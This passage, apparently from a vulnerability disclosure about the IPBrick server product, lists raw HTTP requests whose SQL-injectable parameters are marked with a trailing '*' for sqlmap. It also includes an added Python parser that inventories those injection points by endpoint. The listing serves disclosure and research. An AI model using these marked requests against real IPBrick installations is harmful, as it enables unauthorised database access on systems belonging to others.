name=\&quot;tb_plugin_show_company_logo\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_recur_hide_never\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_recur_one_year_max\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_executing_state\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_resource_users\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_executing_interval\&quot;\x0d\x0a\x0d\x0a2\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;lastrmt\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_name[1]\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_doAction[1]\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_action[1]\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;show_alt_emails\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;horde_signature\&quot;\x0d\x0a\x0d\x0a  \x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; 
name=\&quot;f_accao\&quot;\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;GET
https://ipbrick.domain.com/corpo.php?pagina=export_access_pdf&amp;amp;dateStart=2018-03-16&amp;amp;dateEnd=2018-03-16*&amp;amp;periodo=1&amp;amp;a_ppp=ppp&amp;amp;offset=0&amp;amp;limit=0
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;GET
https://ipbrick.domain.com/corpo.php?pagina=export_access_pdf&amp;amp;dateStart=2018-03-16*&amp;amp;dateEnd=2018-03-16&amp;amp;periodo=1&amp;amp;a_ppp=ppp&amp;amp;offset=0&amp;amp;limit=0
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;pagina\&quot;\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;imap_server\&quot;\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;smtp_server\&quot;\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;db_server\&quot;\x0d\x0a\x0d\x0alocalhost*\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;login_patch\&quot;; filename=\&quot;\&quot;\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;logo_patch\&quot;; filename=\&quot;\&quot;\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;can_export\&quot;\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;admin_users\&quot;\x0d\x0a\x0d\x0a10000\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;admin_prefs\&quot;\x0d\x0a\x0d\x0aadministrator\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_calendar_info\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; 
name=\&quot;tb_plugin_show_company_logo\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_recur_hide_never\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_recur_one_year_max\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_executing_state\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_resource_users\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_executing_interval\&quot;\x0d\x0a\x0d\x0a2\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;lastrmt\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_name[1]\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_doAction[1]\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_action[1]\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;show_alt_emails\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;horde_signature\&quot;\x0d\x0a\x0d\x0a  \x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; 
name=\&quot;f_accao\&quot;\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;pagina\&quot;\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;imap_server\&quot;\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;smtp_server\&quot;\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;db_server\&quot;\x0d\x0a\x0d\x0alocalhost\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;login_patch\&quot;; filename=\&quot;\&quot;\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;logo_patch\&quot;; filename=\&quot;\&quot;\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;can_export\&quot;\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;admin_users\&quot;\x0d\x0a\x0d\x0a10000\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;admin_prefs\&quot;\x0d\x0a\x0d\x0aadministrator\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_calendar_info\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; 
name=\&quot;tb_plugin_show_company_logo\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_recur_hide_never\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_recur_one_year_max\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_executing_state\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_resource_users\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_executing_interval\&quot;\x0d\x0a\x0d\x0a2\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;lastrmt\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_name[1]\&quot;\x0d\x0a\x0d\x0a*\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_doAction[1]\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_action[1]\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;show_alt_emails\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;horde_signature\&quot;\x0d\x0a\x0d\x0a  \x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; 
name=\&quot;f_accao\&quot;\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
-----------------------------9173100016821337141718121561\x0d\x0aContent-Disposition: form-data; name=\&quot;pagina\&quot;\x0d\x0a\x0d\x0avoip_options_alterar_altera\x0d\x0a-----------------------------9173100016821337141718121561\x0d\x0aContent-Disposition: form-data; name=\&quot;option\&quot;\x0d\x0a\x0d\x0aintercom\x0d\x0a-----------------------------9173100016821337141718121561\x0d\x0aContent-Disposition: form-data; name=\&quot;estado_intercom_unidir\&quot;\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------9173100016821337141718121561\x0d\x0aContent-Disposition: form-data; name=\&quot;extra_intercom_unidir\&quot;\x0d\x0a\x0d\x0a*62*\x0d\x0a-----------------------------9173100016821337141718121561\x0d\x0aContent-Disposition: form-data; name=\&quot;estado_intercom_bidir\&quot;\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------9173100016821337141718121561\x0d\x0aContent-Disposition: form-data; name=\&quot;extra_intercom_bidir\&quot;\x0d\x0a\x0d\x0a*63\x0d\x0a-----------------------------9173100016821337141718121561\x0d\x0aContent-Disposition: form-data; name=\&quot;extra_intercom_restriction\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------9173100016821337141718121561\x0d\x0aContent-Disposition: form-data; name=\&quot;f_accao\&quot;\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------9173100016821337141718121561--\x0d\x0a
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;GET
https://ipbrick.domain.com/corpo.php?pagina=user_sys_ver&amp;amp;f_idusersystem=172115923*
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
pagina=vpn_configuracao_alterar_altera&amp;amp;f_ip_inicio_1=192&amp;amp;f_ip_inicio_2=168&amp;amp;f_ip_inicio_3=69&amp;amp;f_ip_inicio_4=90&amp;amp;f_ip_fim_1=192*&amp;amp;f_ip_fim_2=168&amp;amp;f_ip_fim_3=69&amp;amp;f_ip_fim_4=99&amp;amp;f_accao=Modify
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
pagina=vpn_configuracao_alterar_altera&amp;amp;f_ip_inicio_1=192&amp;amp;f_ip_inicio_2=168&amp;amp;f_ip_inicio_3=69&amp;amp;f_ip_inicio_4=90&amp;amp;f_ip_fim_1=192&amp;amp;f_ip_fim_2=168*&amp;amp;f_ip_fim_3=69&amp;amp;f_ip_fim_4=99&amp;amp;f_accao=Modify
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
pagina=vpn_configuracao_alterar_altera&amp;amp;f_ip_inicio_1=192&amp;amp;f_ip_inicio_2=168&amp;amp;f_ip_inicio_3=69&amp;amp;f_ip_inicio_4=90&amp;amp;f_ip_fim_1=192&amp;amp;f_ip_fim_2=168&amp;amp;f_ip_fim_3=69*&amp;amp;f_ip_fim_4=99&amp;amp;f_accao=Modify
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
pagina=vpn_configuracao_alterar_altera&amp;amp;f_ip_inicio_1=192&amp;amp;f_ip_inicio_2=168&amp;amp;f_ip_inicio_3=69&amp;amp;f_ip_inicio_4=90&amp;amp;f_ip_fim_1=192&amp;amp;f_ip_fim_2=168&amp;amp;f_ip_fim_3=69&amp;amp;f_ip_fim_4=99*&amp;amp;f_accao=Modify
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
pagina=vpn_configuracao_alterar_altera&amp;amp;f_ip_inicio_1=192*&amp;amp;f_ip_inicio_2=168&amp;amp;f_ip_inicio_3=69&amp;amp;f_ip_inicio_4=90&amp;amp;f_ip_fim_1=192&amp;amp;f_ip_fim_2=168&amp;amp;f_ip_fim_3=69&amp;amp;f_ip_fim_4=99&amp;amp;f_accao=Modify
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
pagina=vpn_configuracao_alterar_altera&amp;amp;f_ip_inicio_1=192&amp;amp;f_ip_inicio_2=168*&amp;amp;f_ip_inicio_3=69&amp;amp;f_ip_inicio_4=90&amp;amp;f_ip_fim_1=192&amp;amp;f_ip_fim_2=168&amp;amp;f_ip_fim_3=69&amp;amp;f_ip_fim_4=99&amp;amp;f_accao=Modify
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
pagina=vpn_configuracao_alterar_altera&amp;amp;f_ip_inicio_1=192&amp;amp;f_ip_inicio_2=168&amp;amp;f_ip_inicio_3=69*&amp;amp;f_ip_inicio_4=90&amp;amp;f_ip_fim_1=192&amp;amp;f_ip_fim_2=168&amp;amp;f_ip_fim_3=69&amp;amp;f_ip_fim_4=99&amp;amp;f_accao=Modify
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
pagina=vpn_configuracao_alterar_altera&amp;amp;f_ip_inicio_1=192&amp;amp;f_ip_inicio_2=168&amp;amp;f_ip_inicio_3=69&amp;amp;f_ip_inicio_4=90*&amp;amp;f_ip_fim_1=192&amp;amp;f_ip_fim_2=168&amp;amp;f_ip_fim_3=69&amp;amp;f_ip_fim_4=99&amp;amp;f_accao=Modify
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;pagina\&quot;\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;imap_server\&quot;\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;smtp_server\&quot;\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;db_server\&quot;\x0d\x0a\x0d\x0alocalhost\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;login_patch\&quot;; filename=\&quot;\&quot;\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;logo_patch\&quot;; filename=\&quot;\&quot;\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;can_export\&quot;\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;admin_users\&quot;\x0d\x0a\x0d\x0a10000\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;admin_prefs\&quot;\x0d\x0a\x0d\x0aadministrator\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_calendar_info\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; 
name=\&quot;tb_plugin_show_company_logo\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_recur_hide_never\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_recur_one_year_max\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_executing_state\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_resource_users\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_executing_interval\&quot;\x0d\x0a\x0d\x0a2\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;lastrmt\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_name[1]\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_doAction[1]\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_action[1]\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;show_alt_emails\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;horde_signature\&quot;\x0d\x0a\x0d\x0a  *\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; 
name=\&quot;f_accao\&quot;\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
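&lt;p&gt;Every request above marks the parameter found injectable with a trailing &lt;code&gt;*&lt;/code&gt;, the same marker convention sqlmap accepts in request files. The parser below is an added example and not code from the original article or from IPBrick: it reads blocks of the form method / URL / body, undoes the escaped CRLFs, escaped quotes and wrapped header lines of the multipart bodies, and turns the whole listing into an inventory of injection points per endpoint. The sample listing embedded in it is constructed from three of the requests above, with the multipart body shortened and a made-up boundary.&lt;/p&gt;

```python
"""Parse a listing of HTTP requests whose injectable parameter is marked with
a trailing '*' (the marker convention sqlmap uses) into a structured inventory.
Added example for this page; it is not code from the original article."""
import re
from typing import NamedTuple
from urllib.parse import parse_qsl, urlsplit

MARK = "*"


class InjectionPoint(NamedTuple):
    method: str
    path: str
    location: str   # "query", "form" or "multipart"
    parameter: str
    value: str      # value as sent, with the marker removed


# One multipart part: disposition header, optional Content-Type, blank line,
# value, then the start of the next boundary.
PART_RE = re.compile(
    r'Content-Disposition: form-data;\s*name="([^"]+)"'
    r'(?:; filename="[^"]*")?\r\n'
    r'(?:Content-Type: [^\r\n]*\r\n)?'
    r'\r\n(.*?)\r\n--',
    re.S,
)


def parse_multipart(body):
    """Return (name, value) pairs from a multipart body as printed on the page:
    CRLF written as the eight characters backslash-x0d backslash-x0a, quotes
    escaped with a backslash, and long header lines possibly wrapped."""
    raw = body.replace("\n", "")
    raw = raw.replace("\\x0d\\x0a", "\r\n").replace('\\"', '"')
    return [(m.group(1), m.group(2)) for m in PART_RE.finditer(raw)]


def marked(pairs):
    """Keep only the pairs whose value ends with the marker, marker stripped."""
    return [(n, v[:-len(MARK)]) for n, v in pairs if v.endswith(MARK)]


def parse_listing(text):
    """Split the listing into blank-line-separated blocks of
    METHOD / URL / optional body and collect every marked parameter."""
    points = []
    for block in re.split(r"\n[ \t]*\n", text.strip()):
        lines = block.splitlines()
        if len(lines) > 1:
            method = lines[0].strip().upper()
            url = urlsplit(lines[1].strip())
            body = "".join(lines[2:])   # wrapped body lines belong together
            found = []
            if url.query:
                found += [("query", n, v) for n, v in
                          marked(parse_qsl(url.query, keep_blank_values=True))]
            if body.startswith("--"):
                found += [("multipart", n, v) for n, v in marked(parse_multipart(body))]
            elif body:
                found += [("form", n, v) for n, v in
                          marked(parse_qsl(body, keep_blank_values=True))]
            for location, name, value in found:
                points.append(InjectionPoint(method, url.path, location, name, value))
    return points


def by_path(points):
    """Inventory view: path mapped to the sorted injectable parameter names."""
    out = {}
    for p in points:
        out.setdefault(p.path, set()).add(p.parameter)
    return {path: sorted(names) for path, names in out.items()}


# Constructed sample in the page's format: three requests, the multipart body
# shortened and its boundary made up. Ampersands are written as the \x26 escape.
SAMPLE_LISTING = (
    "GET\n"
    "https://ipbrick.domain.com/corpo.php?pagina=utilizador_alterar\x26f_utilizador=*\n"
    "\n"
    "POST\n"
    "https://ipbrick.domain.com/ajax/generateXMLStats_proxy.php\n"
    "dateStart=2018-03-14*\x26dateEnd=2018-03-14\x26periodo=1\x26fusername=\x26limit=100\n"
    "\n"
    "POST\n"
    "https://ipbrick.domain.com/corpo.php\n"
    + r'-----------------------------111\x0d\x0aContent-Disposition: form-data; '
      r'name=\"pagina\"\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a'
    + r'-----------------------------111\x0d\x0aContent-Disposition: form-data; '
      r'name=\"login_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a'
    + r'-----------------------------111\x0d\x0aContent-Disposition: form-data; ' + "\n"
    + r'name=\"admin_users\"\x0d\x0a\x0d\x0a10000*\x0d\x0a-----------------------------111--\x0d\x0a' + "\n"
)


if __name__ == "__main__":
    for path, names in by_path(parse_listing(SAMPLE_LISTING)).items():
        print(path, ", ".join(names))
```

&lt;p&gt;Only a trailing &lt;code&gt;*&lt;/code&gt; counts as a marker: VoIP feature codes such as &lt;code&gt;*63&lt;/code&gt; are left alone, and &lt;code&gt;*62*&lt;/code&gt; is reported as the value &lt;code&gt;*62&lt;/code&gt;.&lt;/p&gt;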

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;pagina\&quot;\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;imap_server\&quot;\x0d\x0a\x0d\x0aipbrick.domain.com*\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;smtp_server\&quot;\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;db_server\&quot;\x0d\x0a\x0d\x0alocalhost\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;login_patch\&quot;; filename=\&quot;\&quot;\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;logo_patch\&quot;; filename=\&quot;\&quot;\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;can_export\&quot;\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;admin_users\&quot;\x0d\x0a\x0d\x0a10000\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;admin_prefs\&quot;\x0d\x0a\x0d\x0aadministrator\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_calendar_info\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; 
